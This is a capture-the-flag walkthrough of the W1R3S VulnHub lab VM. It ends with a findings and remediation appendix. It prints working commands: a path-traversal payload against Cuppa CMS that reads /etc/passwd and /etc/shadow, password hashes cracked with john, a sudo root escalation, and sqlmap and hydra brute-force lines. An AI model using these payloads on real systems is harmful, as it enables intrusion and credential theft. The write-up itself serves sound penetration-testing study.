W1R3S: 1.0.1 ~ VulnHub - CTF Walkthrough

Objective

You have been hired to do a penetration test on the W1R3S.inc individual server and report all findings. They have asked you to gain root access and find the flag (located in /root directory).

Source: [ VulnHub.com ]

Status: [ Completed ]

Methodology

Discovery

root@blaksec:/ # export TANGO=192.168.56.101
root@blaksec:~/Desktop/w1r3s# nmap -O -sT -sV -p- -T5 $TANGO

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-26 19:01 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00093s latency).
Not shown: 55528 filtered ports, 10003 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 08:00:27:CB:EE:8B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Entry Point #1 - Port 80 (HTTP)

Enumeration

A quick scan with dirb came back with two directories wordpress and administrator. The former runs the obvious - Word Press, the latter - CUPPA CMS

WordPress is configured to run under localhost so we need to update /etc/hosts

192.168.56.101 localhost

A quick checked of WordPress with wp-scan did not reveal anything interesting. Gut feel tells me to put that aside and move to CUPPA older versions of which, according to google, come with a LFI vulnerability.

Exploitation

root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://localhost/administrator/alerts/alertConfigField.php |grep sbin
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
......
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin

And taking it a step further...

root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://localhost/administrator/alerts/alertConfigField.php
...
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0
...
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
...
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:999...

Didn't take long to crack the hashes with good old trusty john


root@blaksec:~/Desktop/w1r3s# john --show shadow.txt 
w1r3s:computer
www-data:www-data

2 password hashes cracked, 1 left
root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# ssh w1r3s@$TANGO
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
ECDSA key fingerprint is SHA256:/3N0PzPMqtXlj9QWJFMbCufh2W95JylZ/oF82NkAAto.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.101' (ECDSA) to the list of known hosts.
----------------------
Think this is the way?
----------------------
Well,........possibly.
----------------------
w1r3s@192.168.56.101's password: 
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

108 packages can be updated.
6 updates are security updates.

.....You made it huh?....
Last login: Sun Apr  1 14:38:25 2018 from 192.168.56.200
w1r3s@W1R3S:~$


w1r3s@W1R3S:~$ sudo -l
sudo: unable to resolve host W1R3S: Connection refused
[sudo] password for w1r3s: 
Matching Defaults entries for w1r3s on W1R3S:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User w1r3s may run the following commands on W1R3S:
    (ALL : ALL) ALL
w1r3s@W1R3S:~$ sudo /bin/bash
sudo: unable to resolve host W1R3S: Connection refused
root@W1R3S:~# cd /root
root@W1R3S:/root# ls
flag.txt
root@W1R3S:/root# cat flag.txt 
-----------------------------------------------------------------------------------------
   ____ ___  _   _  ____ ____      _  _____ _   _ _        _  _____ ___ ___  _   _ ____  
  / ___/ _ \| \ | |/ ___|  _ \    / \|_   _| | | | |      / \|_   _|_ _/ _ \| \ | / ___| 
 | |  | | | |  \| | |  _| |_) |  / _ \ | | | | | | |     / _ \ | |  | | | | |  \| \___ \ 
 | |__| |_| | |\  | |_| |  _ <  / ___ \| | | |_| | |___ / ___ \| |  | | |_| | |\  |___) |
  \____\___/|_| \_|\____|_| \_\/_/   \_\_|  \___/|_____/_/   \_\_| |___\___/|_| \_|____/ 
                                                                                        
-----------------------------------------------------------------------------------------

                          .-----------------TTTT_-----_______
                        /''''''''''(______O] ----------____  \______/]_
     __...---'"""\_ --''   Q                               ___________@
 |'''                   ._   _______________=---------"""""""
 |                ..--''|   l L |_l   |
 |          ..--''      .  /-___j '   '
 |    ..--''           /  ,       '   '
 |--''                /           `    \
                      L__'         \    -
                                    -    '-.
                                     '.    /
                                       '-./

----------------------------------------------------------------------------------------
  YOU HAVE COMPLETED THE
               __      __  ______________________   _________
              /  \    /  \/_   \______   \_____  \ /   _____/
              \   \/\/   / |   ||       _/ _(__  < \_____  \ 
               \        /  |   ||    |   \/       \/        \
                \__/\  /   |___||____|_  /______  /_______  /.INC
                     \/                \/       \/        \/        CHALLENGE, V 1.0
----------------------------------------------------------------------------------------

CREATED BY SpecterWires

------------------------------------------------------------------------------

Final Notes

Lots of decoys! Some things I tried which did not work but might come handy one day:

Using nmap wordpress scripts

root@kali:~/Desktop/Bob:1# nmap -sV --script http-wordpress-enum -p 80 --script http-wordpress-users --script-args 'limit=5000,basepath=/wordpress/' 192.168.56.101
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-wordpress-users: 
| Username found: joseph-g
|_Search stopped at ID #5000. Increase the upper limit if necessary with 'http-wordpress-users.limit'
MAC Address: 08:00:27:CB:EE:8B (Oracle VirtualBox virtual NIC)

root@kali:~/Desktop/Bob:1# nmap -sV --script http-wordpress-enum -p 80 --script-args 'http-wordpress-enum.root=/wordpress,http-wordpress-enum.search-limit=all' 192.168.56.101
Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-02 08:32 EDT
Nmap scan report for localhost (192.168.56.101)
Host is up (0.00024s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-wordpress-enum: 
| Search 	limited to top 50546 themes/plugins
|   themes
|     twentyfifteen 1.9
|     twentysixteen 1.4
|     twentyseventeen 1.4nmap -O -sT -sV -p- -T5 192.168.56.101
|   plugins
|_    akismet 4.0.2
MAC Address: 08:00:27:CB:EE:8B (Oracle VirtualBox virtual NIC)

Using sqlmap

sqlmap -u http://localhost/administrator/installation/ --dbms=mysql --data="host=localhost&db=asdf&user=root&password=asdf&table_prefix=cu_&name=Administrator&email=asdf%40mail.com&username=admin&username_password=admin&view=installation_finished" --dump users --level=5 --risk=3

Using hydra to bruteforce WP login

hydra -u -P /usr/share/wordlists/rockyou.txt -a admin 192.168.56.101 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=incorrect'

Appendix A: Vulnerability Detail and Mitigation

Vulnerabilities in un-patched software
Rating High
Description An outdated version of Cuppa CMS was found running on the server, exposed and accessible to the outside network. This version is known for it's Local File Inclusion vulnerability.
Impact An attacker can explore the vulnerability to gain access to various files on the local file system, including but not limited to /etc/passwd, /etc/shadow files, which contain user login information and user passwords.
Remediation Update Cuppa CMS software to the latest stable version. Additionally, set up system permissions in the way that critical system files like /etc/passwd are not accessible to the user used to run webserver processes.


Weak password policies
Rating High
Description Two user accounts are configured with easy-to-guess dictionary-based passwords.
Impact An attacker would be able to easily compromise user accounts using dictionary attacks, which will enable them to log in to the host via ssh.
Remediation Implement stronger password policies enforcing proper password complexity, disallowing dictionary based passwords. Perform periodic audit of the passwords using tools like cracklib.
All-inclusive sudo role
Rating Medium
Description Sudo role for user w1r3s allows for unrestricted access to execute any commands as root user.
Impact After gaining access to w13rs account, an attacker will be able to escalate their privileges, gaining access to the root shell.
Remediation Restrict sudo roles only to specific command.